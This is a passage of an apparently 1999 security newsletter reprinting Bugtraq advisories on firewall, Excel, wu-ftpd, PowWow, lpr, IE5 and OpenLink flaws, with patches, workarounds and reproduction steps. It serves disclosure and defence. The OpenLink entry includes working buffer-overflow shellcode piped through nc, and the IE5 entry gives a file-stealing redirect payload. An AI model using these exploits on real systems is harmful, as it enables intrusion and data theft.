objects instead. Example: ------ Server 'Foo' | Internet --- FW-1 ---| | ------ Server 'Bar' Supposed there's a user 'Sid' with access only to Server 'Foo', and a second user 'Nancy' with access restricted to Server 'Bar', both controlled by the ldap protocol, using the ldap attribute 'fw1allowed-dst'. The bug will cause that both, Sid and Nancy, will have access to Foo and to Bar. [Quoted from the post by Olaf Selke with permission] credit This vulnerability was posted to the Bugtraq mailing list by Olaf Selke on Wed, 20 Oct 1999. reference web page: Firewall-1 Connection Table Paper (Lance Spitzner) http://www.enteract.com/~lspitz/fwtable.html web page: Checkpoint Tecnical Support (Checkpoint Software) http://www.checkpoint.com/techsupport/ message: Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication (Olaf Selke ) http://www.securityfocus.com/templates/archive.pike?list=1&msg=19991020150002.21047.qmail@tarjan.mediaways.net To: BugTraq Subject: Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication Date: Wed Oct 20 1999 09:00:02 Author: Olaf Selke Message-ID: <19991020150002.21047.qmail@tarjan.mediaways.net> Overwiew: With FireWall-1 Version 4.0 Checkpoint introduced support for the Lightweight Directory Access Protocol (LDAP) for user authentication. It looks like there's a bug in Checkpoint's ldap code which under certain circumstances can lead to unauthorized access to protected systems behind the firewall. Technical background: A user can authenticate himself at the firewall providing a valid username and password. The firewall acts as a ldap client, validating the credentials by a directory server using the ldap protocol. After successful authentication access will be granted to systems protected by the firewall. In contrast to authentication using the Radius or SecurID protocol, after successful authentication the directory server can supply the firewall with additional ldap attributes for the user like the time and day of a week a user is allowed to login, the source addresses a user can run a client from, or the system behind the firewall a user is allowed to access. This can be done individual for each user. In general I think that's a great idea but it seems Checkpoint made something wrong interpreting the ldap attribute 'fw1allowed-dst' which is supposed to control in detail which protected network object a user can access. It seems this attribute is ignored by the firewall software, granting access to all protected network objects instead. Example: ------ Server 'Foo' | Internet --- FW-1 ---| | ------ Server 'Bar' Supposed there's a user 'Sid' with access only to Server 'Foo', and a second user 'Nancy' with access restricted to Server 'Bar', both controlled by the ldap protocol, using the ldap attribute 'fw1allowed-dst'. The bug will cause that both, Sid and Nancy, will have access to Foo and to Bar. Conclusion: I don't consider it as major bug, but it's serious enough that one can't rely on access control enforced through ldap. I've reported this problem through Checkpoint's support channels two weeks ago, but so far there's no response at all. Attached is the original bug report I've sent to technical support. Olaf -- Olaf Selke, olaf.selke@mediaways.net, voice +49 5241 80-7069 =============================== snip =============================== firewall: Solaris 2.6, V4.0 SP4 [VPN + DES + STRONG] management machine: Solaris 2.6, V4.0 SP4 [VPN + DES + STRONG] Directory Server: Solaris 7, Netscape-Directory/4.0 B98.349.0339 Today we found that FW-1 seems to ignore the ldap attribute 'fw1allowed-dst' completely, granting access to 'any' instead. If that's really the case, it could lead to a breach of security. We successfully coupled a FW-1 V4.0 SP4 with a Netscape Directory Server according CP's documentation. Surprisingly this went very smoothly ;-) In a second step we checked if the FW software really cares about the ldap attributes controlling access in detail, using a client authentication rule for this purpose. It looks like the attributes 'fw1hour-range-from', 'fw1hour-range-to', and 'fw1allowed-src' are interpreted as expected by the firewall, so I think we didn't made some mistake in general. However, from our point of view, in any case the ldap attribute 'fw1allowed-dst' is ignored and silently substituted by 'any'. This means a user with restricted access through ldap attributes has full access after successful authentication. @HWA 69.0 Microsoft Excel SYLK Macro Execution Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 727 class Design Error cve GENERIC-MAP-NOMATCH remote No local Yes published October 20, 1999 updated October 20, 1999 vulnerable Microsoft Excel 97 SR2 Microsoft Excel 97 SR1 Microsoft Excel 97 - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows NT 4.0 Microsoft Excel 2000 Microsoft Office 97 - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows NT 4.0 Microsoft Office 2000 When a symbolic link (SYLK) file containing a macro is opened by Excel 97 or Excel 2000, the user is not warned that a macro will be executed upon opening the file (as is customary when Excel opens other spreedsheet files containing macros.) SYLK files are basic ascii files that can be read by a variety of applications, including word processors and other spreadsheet applications. SYLK files can be created using the "Save As" function in Microsoft Excel. Microsoft has released a patch for this vulnerability. It is available at: - Excel 97: http://officeupdate.microsoft.com/downloadDetails/Xl8p7pkg.htm - Excel 2000: http://officeupdate.microsoft.com/2000/downloadDetails/XL9p1pkg.htm credit The vulnerability was reported to Microsoft by David Young of Derby, UK. reference advisory: MS99-044: Patch Available for "Excel SYLK" Vulnerability (MS) http://www.securityfocus.com/templates/advisory.html?id=1798 web page: Microsoft Security Bulletin MS99-044: Frequently Asked Questions (Microsoft) http://www.microsoft.com/security/bulletins/MS99-044faq.asp web page: Q241901: XL2000: Macro Virus Warning Does Not Appear Opening SYLK File (Microsoft) http://support.microsoft.com/support/kb/articles/q241/9/01.asp web page: Q241902: XL97: Macro Virus Warning Does Not Appear Opening SYLK File (Microsoft) http://support.microsoft.com/support/kb/articles/q241/9/02.asp @HWA 70.0 Wu-ftpd message Buffer Overflow Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 726 class Boundary Condition Error cve GENERIC-MAP-NOMATCH remote Yes local No published October 19, 1999 updated October 20, 1999 vulnerable Washington University wu-ftpd 2.5 + RedHat Linux 6.1 not vulnerable Washington University wu-ftpd 2.6.0 There is a buffer overflow in wu-ftpd message file expansions which may be remotely exploitable. In situations where the message file can be written to in some way remotely by regular or anonymous users, this may result in a root compromise. This detailed in an AUSCERT advisory AA-1999.01. Upgrade to the newest version of wu-ftpd not vulnerable to this problem (2.6.0 as of Oct 20, 1999), available at the location below: ftp://ftp.wu-ftpd.org/pub/wu-ftpd/ credit Exposed in AusCERT advisory AA-1999.02, published on October 19, 1999. reference advisory: CA-99-13: Multiple Vulnerabilities in WU-FTPD (CERT) http://www.securityfocus.com/templates/advisory.html?id=1797 advisory: AA-99.02: Multiple Vulnerabilities in wu-ftpd based daemons (AusCERT) http://www.securityfocus.com/templates/advisory.html?id=1799 advisory: RHSA-1999:043-01: Security problems in WU-FTPD (RedHat) http://www.securityfocus.com/templates/advisory.html?id=1801 @HWA 71.0 Tribal Voice PowWow Password Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 724 class Unknown cve GENERIC-MAP-NOMATCH remote Yes local Yes published October 19, 1999 updated October 19, 1999 vulnerable Tribal Voice PowWow 3.73 - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows NT 4.0 PowWow is a network communications tool by Tribal Voice, similar to ICQ or AOL Instant Messenger. PowWow contains several vulnerabilities whereby a user's PowWow password can be obtained by an attacker. The first vulnerability involves the powwow.ini file, where a user's name and password are stored in plaintext. This file can be found at C:\windows\powwow.ini on Win9x platforms and at C:\winnt\powwow.ini on NT machines. The entries look like this: LOCALNAME:user @ server.com LOCALPASS:user's_password The second vulnerability is related to how PowWow transmits the password to the PowWow server to authenticate the user in various operations, mostly related to listings in the PowWow white pages. The password is sent via the URL, in plaintext, meaning it is accessible visibly from the address bar or (later) the history list of the browser being used, as well as via sniffing at any intermediary point on the network. For example, the URL used to remove oneself from the White pages listing is: http ://ww2.tribal.com/white_pages/RemoveWpfromPow.cfm?PowID=user @ server.com&Pswd=user's_password The third vulnerability is in Tribal Voice's free email service for PowWow users. During the sign-up process, the user's password is displayed back to them in a web page, which once again can be viewed by anyone in the vicinity or retrieved via sniffing or the browser's local cache. Also, this free email service allows the option of having it log into a POP server elsewhere as the user, retrieving your mail, and presenting it to you in your PowWow inbox. To do this, you enter the info for your POP account into a web form at Tribal Voice, and they store it at the server for later use. This means that the user's password is stored remotely (encryption/security practices unknown), which leads to two problems: 1) If the Tribal Voice server is compromised, all users using this option could have their POP accounts elsewhere compromised as well. 2) Attackers could use this service to remotely access POP accounts they have hacked/obtained, with an added level of anonymity Tribal Voice has claimed that the powwow.ini issue will be fixed in a future release of the product. Password storage can be disabled via the preferences button in the program (default is On). credit Original information submitted to Security Focus by Jim Williams . Additional research by Ben Greenbaum of Security Focus. reference web page:Tribal Voice Homepage (Tribal Voice) http://www.tribal.com/ @HWA 72.0 RedHat lpr/lpd Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 718 object lpr and lpd (exec) class Race Condition Error cve GENERIC-MAP-NOMATCH remote No local Yes published October 18, 1999 updated October 18, 1999 vulnerable RedHat Linux 6.1 RedHat Linux 6.0 RedHat Linux 5.2 RedHat Linux 5.1 RedHat Linux 5.0 RedHat Linux 4.2 RedHat Linux 4.1 RedHat Linux 4.0 The lpr packages that ship with RedHat Linux releases 4.x to 6.1 contain vulnerabilities which may allow printing of files for which read access is not allowed. The first of the two problems is a race condition that can be exploited between the access checking and the opening of the file. The second is a symlink attack that could also be used to print files that normally cannot be read by a regular user (through lpr -s). Patched versions of the lpr packages are available at the links listed below: Red Hat Linux 4.x: Intel: ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm Alpha: ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm Sparc: ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm Source packages: ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm Red Hat Linux 5.x: Intel: ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm Alpha: ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm Sparc: ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm Source packages: ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm Red Hat Linux 6.x: Intel: ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm Alpha: ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm Sparc: ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm Source packages: ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm The MD5 sums for each of these packages is available in the advisory linked to from the references section. credit Released in RedHat advisory RHSA-1999:041-01 on October 17, 1999. reference advisory: RHSA-1999:041-01: File access problems in lpr/lpd (RedHat) http://www.securityfocus.com/templates/advisory.html?id=1792 web page: Updates, Fixes, and Errata Page (RedHat) http://www.redhat.com/corp/support/errata/index.html RHSA-1999:041-01: File access problems in lpr/lpd Published: Sun Oct 17 1999 Updated: Mon Oct 18 1999 --------------------------------------------------------------------- Red Hat, Inc. Security Advisory Synopsis: File access problems in lpr/lpd Advisory ID: RHSA-1999:041-01 Issue date: 1999-10-17 Updated on: Keywords: lpr lpd permissions Cross references: --------------------------------------------------------------------- 1. Topic: There are potential problems with file access checking in the lpr and lpd programs. These could allow users to potentially print files they do not have access to. Also, there are bugs in remote printing in the lpd that shipped with Red Hat Linux 6.1. 2. Bug IDs fixed (http://developer.redhat.com/bugzilla for more info): 5122 5540 5697 5832 5835 5903 5949 3. Relevant releases/architectures: Red Hat Linux 4.x, all architectures Red Hat Linux 5.x, all architectures Red Hat Linux 6.x, all architectures 4. Obsoleted by: 5. Conflicts with: 6. RPMs required: Red Hat Linux 4.x: Intel: ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm Alpha: ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm Sparc: ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm Source packages: ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm Red Hat Linux 5.x: Intel: ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm Alpha: ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm Sparc: ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm Source packages: ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm Red Hat Linux 6.x: Intel: ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm Alpha: ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm Sparc: ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm Source packages: ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm 7. Problem description: There are two problems in the lpr and lpd programs. By exploiting a race between the access check and the actual file opening, it is potentially possible to have lpr read a file as root that the user does not have access to. Also, the lpd program would blindly open queue files as root; by use of the '-s' flag to lpr, it was possible to have lpd print files that the user could not access. Thanks go to Tymm Twillman for pointing out these vulnerabilities. Also, various bugs in remote printing that were present in the lpd released with Red Hat Linux 6.1 have been fixed. 8. Solution: For each RPM for your particular architecture, run: rpm -Uvh where filename is the name of the RPM. 9. Verification: MD5 sum Package Name -------------------------------------------------------------------------- fb854cbddc9e38847c31aa6e07904ae6 lpr-0.43-0.4.2.i386.rpm 10d7f947c5e1e2ac13c88fec95e53838 lpr-0.43-0.4.2.alpha.rpm aea5f8564289be2f344169ba89da5ff7 lpr-0.43-0.4.2.sparc.rpm faaa81630ac3d5de295deec4c0cb2883 lpr-0.43-0.4.2.src.rpm 39dddd66751ae7e8e5b6fc179d61dd88 lpr-0.43-0.5.2.i386.rpm 479537d92946838857276967d6fb4e98 lpr-0.43-0.5.2.alpha.rpm b8c3970d327b1bdd3c14b933b4dab5c0 lpr-0.43-0.5.2.sparc.rpm 3aa3386da05e96adc04db5b376f307dd lpr-0.43-0.5.2.src.rpm cc1f97635c0a1029febc1f0e75e40527 lpr-0.43-2.i386.rpm 9c611726e6ec6f754e0b6503f87b8e97 lpr-0.43-2.alpha.rpm 1e8ff6f9f3272f30ca96f4dcdfdc9b53 lpr-0.43-2.sparc.rpm 2c258e8aa98f5b005b326f3110410965 lpr-0.43-2.src.rpm These packages are signed with GnuPG by Red Hat Inc. for security. Our key is available at: http://www.redhat.com/corp/contact.html You can verify each package with the following command: rpm --checksig If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: rpm --checksig --nogpg Note that you need RPM >= 3.0 to check GnuPG keys. 10. References: @HWA 73.0 Gauntlet Firewall Rules Bypass Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 721 class Design Error cve GENERIC-MAP-NOMATCH remote Yes local Yes published October 18, 1999 updated October 18, 1999 vulnerable Network Associates Gauntlet Firewall 5.0 It may be possible to violate all firewall rules if certain conditions are met when Gauntlet Firewall 5.0 is installed on the BSDI platform with a specific configuration. The following things need to happen in the order listed below for Gauntlet to be exploitable: 1) Install BSDI 3.1 2) Install Gauntlet 5.0 3) Install BSDI patch M310-049 4) Install Gauntlet 5.0 kernel patch level 2 5) Remove any proxy settings on client machine. 6) Set the default route on the client machine and attempt to connect to any host through a normal tcp connection. This problem surfaces when connections are made through any adaptive proxy, "old" proxy or no proxy at all. In order to exploit this, a route will need to be specified since NAT will not occur when data is sent through the affected firewall. None of the connections that ignore the rules are logged in /var/log/messages. Keith Young describes how to replicate the problem (this is taken directly from his bugtraq post): 1) Install BSDI 3.1, March 1998. Use automatic install, however you may install minimal packages if you wish. 2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall 3) Install Gauntlet 5.0. 4) Reboot after installation. 5) Login as root. 6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for external and internal interfaces. If necessary, configure ESPM hosts, DNS settings, and admin users. 7) Quit gauntlet-admin, save changes, and rebuild. 8) After proxies have reconfigured, reboot machine. 9) Since M310-049 is required for Gauntlet kernel patch install, and M310-046 is required for M310-049 installation, download both from ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/ File info: M310-046 1194 Kb Wed Oct 14 00:00:00 1998 M310-049 116 Kb Wed Dec 16 00:00:00 1998 Both patches are considered "OK" by the Gauntlet support site: http://www.tis.com/support/bsd31.html 10) Bring machine to single-user mode by executing "kill -term 1". 11) Execute "perl5 M310-046 apply" to install BSDI libc patch. 12) Execute "perl5 M310-049 apply" to install IP DoS fix. 13) Execute "cd /sys/compile/GAUNTLET-V50/". 14) Build new kernel as required by M310-049 IP DoS kernel fix. # make clean # make depend # make 15) After kernel is rebuilt, reboot machine. 16) Download Gauntlet 5.0 kernel and cluster patch: File info: cluster.BSDI.patch 12623 Kb Wed Sep 01 19:33:00 1999 kernel.BSDI.patch 414 Kb Wed Aug 04 17:54:00 1999 17) As noted in patch install directions, execute the following: # sh ./cluster.BSDI.patch # sh ./kernel.BSDI.patch # cd kernel.BSDI.patch # sh ./apply # cd ../cluster.BSDI.patch # sh ./apply 18) After patches are installed, reboot machine. 19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client machine to trusted network group. Apply changes. 20) Start web browser on client machine. Set web proxy setting to internal interface of firewall. Attempt to connect to external web server. Access is allowed. *This is correct.* 20) Remove http-gw from trusted network services. Apply changes. Attempt to connect to external web server. Access is denied. *This is correct.* ==Problem starts here== 21) Remove proxy setting in web browser on client machine. Set gateway/default route on client machine to internal interface of firewall. Set gateway/default route on server machine to external interface of firewall. 22) Clear web browser cache. Attempt to connect to external web server. Web page is downloaded with no logs in Gauntlet. 23) Start ESPM-GUI. Remove all services from trusted networks services. Remove client machine from ESPM network group. Apply changes. 24) FTP from client machine to server. FTP connection is made though no rule exists. 25) Start telnet server on client machine. Telnet from server to client. Telnet connection is made. Network Associates has released a patch for this problem. Contact the vendor for more information. credit First posted to BugTraq by Keith Young on October 18, 1999. reference web page: Gauntlet Firewall Unix (Network Associates Inc.) http://http://www.nai.com/asp_set/products/tns/gauntletunix_intro.asp message: Gauntlet 5.0 BSDI warning (Keith Young ) http://www.securityfocus.com/templates/archive.pike?list=1&msg=380B47D4.32B1655C@v-one.com To: BugTraq Subject: Gauntlet 5.0 BSDI warning Date: Mon Oct 18 1999 00:16:20 Author: Keith Young Message-ID: <380B47D4.32B1655C@v-one.com> Security issue in Gauntlet 5.0 BSDI when BSDI patches are installed in a specific order by Keith Young (kyoung@v-one.com) -=0=--=0=--=0=--=0=--=0=--=0=--=0=--=0=--=0=- SYSTEM AFFECTED - Gauntlet 5.0 BSDI with latest Gauntlet patches Other Gauntlet 5.0 patched systems are not affected Unpatched Gauntlet 5.0 BSDI is not affected SYNOPSIS - Local trusted and remote non-trusted users with routes through firewall may bypass all Gauntlet security rules. No activity will appear in the /var/log/messages log file. Internal network scheme is exposed. This issue will appear if you do the following in sequence: 1) Install BSDI 3.1 2) Install Gauntlet 5.0 3) Install BSDI patch M310-049 4) Install Gauntlet 5.0 kernel patch level 2 VENDOR CONTACT - Vendor has been contacted and trouble ticket assigned. Patch will be released soon. OTHER NOTES - A) Behavior occurs if connection is through any adaptive proxy (http-pdk), "old" proxy (http-gw) or no proxy at all (any TCP connection). B) Packets will not be NATed by firewall, so to be 100% successful, a route will need to be published to get to your internal network through your firewall. C) As mentioned, nothing is ever logged in /var/log/messages D) Adding NATs to Gauntlet does not change the packets. SOLUTIONS - A) Install M310-049 *before* installing Gauntlet 5.0. B) A vendor patch/fix/suggestion is coming. C) Workaround - **Neither myself, V-ONE, nor NAI is responsible for the correct/incorrect use of this.** **Doing this may adversely affect your system and may void tech support.** (as root) 1) # cp /usr/local/sys.gauntlet/i386/OBJ/ip_input.o /usr/src/sys/i386/OBJ 2) # sh /usr/local/sys.gauntlet/build_kernel/build_kernel 50.1 3) # reboot HOW TO REPRODUCE - Network configuration: [client]====[firewall]====[WWW/FTP-server] (internal) (external) Client/Server: either Win98 or RedHat Linux 6.0, P2-350, 128MB RAM Firewall: P2-350, 256MB RAM, 10GB hard drive, any BSDI-compatible NIC All network connections done via 10baseT crossover cables, however users can be across hubs or routers. Listed here are the exact steps needed to reproduce this problem. 1) Install BSDI 3.1, March 1998. Use automatic install, however you may install minimal packages if you wish. 2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall 3) Install Gauntlet 5.0. 4) Reboot after installation. 5) Login as root. 6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for external and internal interfaces. If necessary, configure ESPM hosts, DNS settings, and admin users. 7) Quit gauntlet-admin, save changes, and rebuild. 8) After proxies have reconfigured, reboot machine. 9) Since M310-049 is required for Gauntlet kernel patch install, and M310-046 is required for M310-049 installation, download both from ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/ File info: M310-046 1194 Kb Wed Oct 14 00:00:00 1998 M310-049 116 Kb Wed Dec 16 00:00:00 1998 Both patches are considered "OK" by the Gauntlet support site: http://www.tis.com/support/bsd31.html 10) Bring machine to single-user mode by executing "kill -term 1". 11) Execute "perl5 M310-046 apply" to install BSDI libc patch. 12) Execute "perl5 M310-049 apply" to install IP DoS fix. 13) Execute "cd /sys/compile/GAUNTLET-V50/". 14) Build new kernel as required by M310-049 IP DoS kernel fix. # make clean # make depend # make 15) After kernel is rebuilt, reboot machine. 16) Download Gauntlet 5.0 kernel and cluster patch: File info: cluster.BSDI.patch 12623 Kb Wed Sep 01 19:33:00 1999 kernel.BSDI.patch 414 Kb Wed Aug 04 17:54:00 1999 17) As noted in patch install directions, execute the following: # sh ./cluster.BSDI.patch # sh ./kernel.BSDI.patch # cd kernel.BSDI.patch # sh ./apply # cd ../cluster.BSDI.patch # sh ./apply 18) After patches are installed, reboot machine. 19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client machine to trusted network group. Apply changes. 20) Start web browser on client machine. Set web proxy setting to internal interface of firewall. Attempt to connect to external web server. Access is allowed. *This is correct.* 20) Remove http-gw from trusted network services. Apply changes. Attempt to connect to external web server. Access is denied. *This is correct.* ==Problem starts here== 21) Remove proxy setting in web browser on client machine. Set gateway/default route on client machine to internal interface of firewall. Set gateway/default route on server machine to external interface of firewall. 22) Clear web browser cache. Attempt to connect to external web server. Web page is downloaded with no logs in Gauntlet. 23) Start ESPM-GUI. Remove all services from trusted networks services. Remove client machine from ESPM network group. Apply changes. 24) FTP from client machine to server. FTP connection is made though no rule exists. 25) Start telnet server on client machine. Telnet from server to client. Telnet connection is made. @HWA 74.0 Microsoft IE5 Javascript URL Redirection Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 722 class Design Error cve GENERIC-MAP-NOMATCH remote Yes local Unknown published October 18, 1999 updated October 18, 1999 vulnerable Microsoft Internet Explorer 5.0 for Windows NT 4.0 + Microsoft Windows NT 4.0 Microsoft Internet Explorer 5.0 for Windows 98 + Microsoft Windows 98 Microsoft Internet Explorer 5.0 for Windows 95 + Microsoft Windows 95 Microsoft Internet Explorer 5.0 for Windows 2000 - Microsoft Windows NT 2000.0 Microsoft Internet Explorer 4.0.1 for Windows NT 4.0 - Microsoft Windows NT 4.0 Microsoft Internet Explorer 4.0.1 for Windows 98 - Microsoft Windows 98 Microsoft Internet Explorer 4.0.1 for Windows 95 - Microsoft Windows 95 A malicious web site operator could design a web page that, when visited by an IE5 user, would read a local file from the victim host (or any file on the victim's network to which the victim has access) and send the contents of that file to a designated remote location. 1) In the instance noted above, the IE5 user visits a malicious web site. 2) The web site instructs the client to open another IE5 browser window and display the contents of a file residing on the IE5 user's host (or another host on the network to which the IE5 user has access). 3) Immediately after opening the new browser window, the window is instructed to browse to a specified web site ie: http://malicious server.com/hack.cgi?doit. 4) The hack.cgi?doit page does not return a web page, but instead redirects the window to a javascript URL containing embedded executable code. 5) The javascript code (from step 4) can now access any files on the victim's host (or any file on the victim's network to which the victim has access) and send it to a location maintained by the malicious web site operator. Under normal circumstances, javascript received from a non-local "security zone" is not allowed to perform such actions against files on the local host. In this instance, however, the IE5 browser has been fooled (via http redirect to javascript) into thinking that the Javascript should execute under the security context of the local host's security zone as the javascript was requested from a browser displaying the local file. Microsoft has released a FAQ that contains a good description of this vulnerability: http://www.microsoft.com/security/bulletins/MS99-043faq.asp From Georgi's Bugtraq post: // "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect to: "javascript:alert(document.body.innerText)" A demonstration of this exploit is available at: http://www.nat.bg/~joro/jsredir1.html credit This vulnerabilty was posted to Bugtraq by Georgi Guninski on October 18, 1999. reference advisory: MS99-043: Workaround Available for "Javascript Redirect" Vulnerability (MS) http://www.securityfocus.com/templates/advisory.html?id=1793 message: IE 5.0 allows reading local (and from any domain) files and window spoofing usin (Georgi Guninski ) http://www.securityfocus.com/templates/archive.pike?list=1&msg=380B199A.3765A0D4@nat.bg web page: HTTP redirection to "javascript:" (Georgi Guninski ) http://www.nat.bg/~joro/jsredir1.html web page: Microsoft Security Bulletin MS99-043: Frequently Asked Questions (Microsoft) http://www.securityfocus.com/vdb/Microsoft Security Bulletin MS99-043: Frequently Asked Questions To: BugTraq Subject: IE 5.0 allows reading local (and from any domain) files and window spoofing using HTTP redirection to "javascript:" Date: Mon Oct 18 1999 10:59:06 Author: Georgi Guninski Message-ID: <380B199A.3765A0D4@nat.bg> IE 5.0 allows reading local (and from any domain) files and window spoofing using HTTP redirection to "javascript:" Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is vulnerable) allows reading local files and text/HTML files from any domain. Window spoofing is possible. It is also possible in some cases to read files behind fiewall. Details: The problem is a HTTP redirect to "javascript:" URLs. If you open a local file and the change its location to an URL that redirects to "javascript:JavaScript code" then the JavaScript code is executed in the security context of the original local file and has access to its DOM. The local file may be sent to an arbitrary server. In a similar way one may do window spoofing. This vulnerability may be exploited using HTML email message or a newsgroup posting. The code is: ---------------------------------------------------------------------------------------- // "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect to: "javascript:alert(document.body.innerText)" ---------------------------------------------------------------------------------------- Workaround: Disable Active Scripting Demonstration is available at http://www.nat.bg/~joro/jsredir1.html Copyright 1999 Georgi Guninski Regards, Georgi Guninski http://www.nat.bg/~joro @HWA 75.0 OpenLink 3.2 Remote Buffer Overflow Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 720 class Boundary Condition Error cve GENERIC-MAP-NOMATCH remote Yes local No published October 15, 1999 updated October 18, 1999 vulnerable OpenLink Software OpenLink 3.2 Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable to a remotely exploitable buffer overflow attack. The problem is in their web configuration utility, and is the result of an unchecked strcpy() call. The consequence is the execution of arbitrary code on the target host (running the configuration utility) with the priviliges of the web software. Exploit: #include #include /* * Exploit for Openlink's web configurator for Linux/glibc2 * use: pipe through netcat to openlink web port (8000 default) * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000 * makes www_sv execute /usr/bin/wall if you hit the address right * * For informational purposes only. This was written to show that * there's a problem, not for skr1pt k1dd33z --. * don't ask me for help on how to use this to crack systems, * help compiling or anything else. It will only compile on * an x86 compiler however. * * Addresses that work for me: 0xbffffb65 (initial run of the broker) * 0xbffffb85 (all consecutive attempts) * probably tied to process ID www_sv runs as; * first try PIDs were in triple digits, others * 4 digit PIDs. * * If this works, generally no more www_sv processes will be run as a side effect. */ void test() { __asm__(" jmp doit exploit: # code basically from Aleph One's smash stacking article, with # minor mods popl %esi movb $0xd0, %al # Get a / character into %al xorb $0xff, %al movb %al, 0x1(%esi) # drop /s into place movb %al, 0x5(%esi) movb %al, 0x9(%esi) xorl %eax,%eax # clear %eax movb %eax,0xe(%esi) # drop a 0 at end of string movl %eax,0x13(%esi) # drop NULL for environment leal 0x13(%esi),%edx # point %edx to environment movl %esi,0xf(%esi) # drop pointer to argv leal 0xf(%esi),%ecx # point %ecx to argv movl %esi,%ebx # point ebx to command - 1 inc %ebx # fix it to point to the right place movb $0xb,%al # index to execve syscall int $0x80 # execute it xorl %ebx,%ebx # if exec failed, exit nicely... movl %ebx,%eax inc %eax int $0x80 doit: call exploit .string \"..usr.bin.wall.\" "); } char *shellcode = ((char *)test) + 3; char code[1000]; int main(int argc, char *argv[]) { int i; int left; unsigned char where[] = {"\0\0\0\0\0"} ; int *here; char *dummy; long addr; if (argc > 1) addr = strtoul(argv[1], &dummy, 0); else addr = 0xbffffb85; fprintf(stderr, "Setting address to %8x\n", addr); *((long *)where) = addr; strcpy(code, shellcode); for (i = 0; i < 64; i++) { strcat(code, where); } printf("GET %s\n", code); exit(0); } Tymm Twillman suggested the following workaround in his post to BugTraq (linked to in the references section): Disable the www_sv application in oplrqb.ini. By default there is a section labeled Persistent Services, with the line "Configurator = www_sv". This section, along with the entire www_sv section, should be commented out with semicolons, e.g. ;[Persistent Services] ;Configurator = www_sv ;[www_sv] ;Program = w3config/www_sv ;Directory = w3config ;CommandLine = ;Environment = WWW_SV ;[Environment WWW_SV] OpenLink has been notified of this problem and is working on a fix. credit First posted to BugTraq by Tymm Twillman on Oct 15, 1999. reference web page: OpenLink Homepage (OpenLink Software) http://www.openlinksw.com message: OpenLink 3.2 Advisory (Tymm Twillman ) 